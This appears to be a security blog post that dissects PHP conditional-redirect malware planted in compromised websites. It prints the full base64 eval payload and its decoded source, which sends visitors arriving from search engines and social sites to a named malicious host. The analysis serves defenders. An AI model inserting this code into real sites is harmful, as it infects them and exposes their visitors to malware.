The Latest in IT Security

I have this beautiful website and now there’s all this garbled code across all of my PHP files. What’s it do, and how did it get there?

This is a quick post to show you some encoded crud that can attack your site, and do some pretty bad stuff.

Encoded Payload – Eval( base64_decode)

Generally speaking, we see this type of payload dropped into PHP, HTML, and JavaScript files. They are typically dropped into an environment through a known vulnerability in outdated software. This isn’t the only entry point, but definitely the one we see the most.

eval(base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9”));

Hard to tell what it’s doing, and to someone that’s not into code, this may not look any different than the rest of the code found in a web file.

Decoded Payload – Conditional Redirect Malware

When you decode the obfuscated payload you get a much better idea for what it is doing.

Here’s the full payload decoded:

error_reporting(0);$qazplm=headers_sent();if (!$qazplm){$referer=$_SERVER[‘HTTP_REFERER’];$uag=$_SERVER[‘HTTP_USER_AGENT’];if ($uag) {if (!stristr($uag,”MSIE 7.0″)){if (stristr($referer,”yahoo”) or stristr($referer,”bing”) orstristr($referer,”rambler”) or stristr($referer,”gogo”) orstristr($referer,”live.com”)or stristr($referer,”aport”) orstristr($referer,”nigma”) or stristr($referer,”webalta”) orstristr($referer,”begun.ru”) orstristr($referer,”stumbleupon.com”) or stristr($referer,”bit.ly”)or stristr($referer,”tinyurl.com”) orpreg_match(“/yandex\.ru\/yandsearch\?(.*?)\&lr\=/”,$referer) orpreg_match (“/google\.(.*?)\/url\?sa/”,$referer) orstristr($referer,”myspace.com”) orstristr($referer,”facebook.com”) orstristr($referer,”aol.com”)) {if (!stristr($referer,”cache”) or !stristr($referer,”inurl”)){header(“Location: http://gigop.americanunfinished.com/”);exit();

Why so dangerous? What’s it do?

After decoding, you’re able to quickly tell that this malicious payload is a conditional redirect malware string.

Lets break down what it’s doing:

Targeting User Agents

When the string is on the site, it will check all inbound requests to that page for the browser type (User Agent) – In this instance the following line adds a condition to check for all user agents exluding IE7:

if (!stristr($uag,”MSIE 7.0″))

What’s the traffic source?

If the traffic source comes from any browser besides IE7, the script carries on looking for other specific conditions. In this case, it will now look for traffic coming from specific referrers:

if (stristr($referer,”yahoo”) or stristr($referer,”bing”) orstristr($referer,”rambler”) or stristr($referer,”gogo”) orstristr($referer,”live.com”)or stristr($referer,”aport”) orstristr($referer,”nigma”) or stristr($referer,”webalta”) orstristr($referer,”begun.ru”) orstristr($referer,”stumbleupon.com”) or stristr($referer,”bit.ly”)or stristr($referer,”tinyurl.com”) orpreg_match(“/yandex\.ru\/yandsearch\?(.*?)\&lr\=/”,$referer) orpreg_match (“/google\.(.*?)\/url\?sa/”,$referer) orstristr($referer,”myspace.com”) orstristr($referer,”facebook.com”) orstristr($referer,”aol.com”)) {

What this does is look for traffic coming from Yahoo, Rambler, etc. – If the traffic is from these sources, and using any browser besides IE7, it will render a specific action. If it does not meet both the browser type, and a referrer match, the action will die.

Action on your behalf

We see a lot of different conditionals, and the action varies. In this case, you get redirected:

if (!stristr($referer,”cache”) or !stristr($referer,”inurl”)){header(“Location: http://gigop.americanunfinished.com/”);

Your site is now being redirected to a site that has been blacklisted for known distribution of malware:

Note: Not only is your site being redirected to a blacklisted website, the website is down for the count. Your end users meeting the conditional criteria will see a nice 403 page.